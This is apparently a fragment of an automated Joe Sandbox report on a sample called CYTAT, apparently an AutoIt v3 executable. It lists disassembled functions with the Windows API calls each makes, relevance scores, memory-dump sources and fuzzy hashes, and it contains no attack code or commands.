                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Proc
                                                • String ID:
                                                • API String ID: 2346855178-0
                                                • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • BlockInput.USER32(00000001), ref: 0045A38B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: BlockInput
                                                • String ID:
                                                • API String ID: 3456056419-0
                                                • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: LogonUser
                                                • String ID:
                                                • API String ID: 1244722697-0
                                                • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N@
                                                • API String ID: 0-1509896676
                                                • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteObject.GDI32(?), ref: 0045953B
                                                • DeleteObject.GDI32(?), ref: 00459551
                                                • DestroyWindow.USER32(?), ref: 00459563
                                                • GetDesktopWindow.USER32 ref: 00459581
                                                • GetWindowRect.USER32(00000000), ref: 00459588
                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                • ShowWindow.USER32(?,00000004), ref: 00459865
                                                • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                • GetStockObject.GDI32(00000011), ref: 004598CD
                                                • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                • DeleteDC.GDI32(00000000), ref: 004598F8
                                                • _wcslen.LIBCMT ref: 00459916
                                                • _wcscpy.LIBCMT ref: 0045993A
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                • GetDC.USER32(00000000), ref: 004599FC
                                                • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                • String ID: $AutoIt v3$DISPLAY$static
                                                • API String ID: 4040870279-2373415609
                                                • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 0044181E
                                                • SetTextColor.GDI32(?,?), ref: 00441826
                                                • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                • GetSysColor.USER32(0000000F), ref: 00441849
                                                • SetBkColor.GDI32(?,?), ref: 00441864
                                                • SelectObject.GDI32(?,?), ref: 00441874
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                • GetSysColor.USER32(00000010), ref: 004418B2
                                                • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                • DeleteObject.GDI32(?), ref: 004418D5
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                • FillRect.USER32(?,?,?), ref: 00441970
                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                • String ID:
                                                • API String ID: 69173610-0
                                                • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(?), ref: 004590F2
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                • GetStockObject.GDI32(00000011), ref: 004592AC
                                                • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                • DeleteDC.GDI32(00000000), ref: 004592D6
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                • GetStockObject.GDI32(00000011), ref: 004593D3
                                                • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                • API String ID: 2910397461-517079104
                                                • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
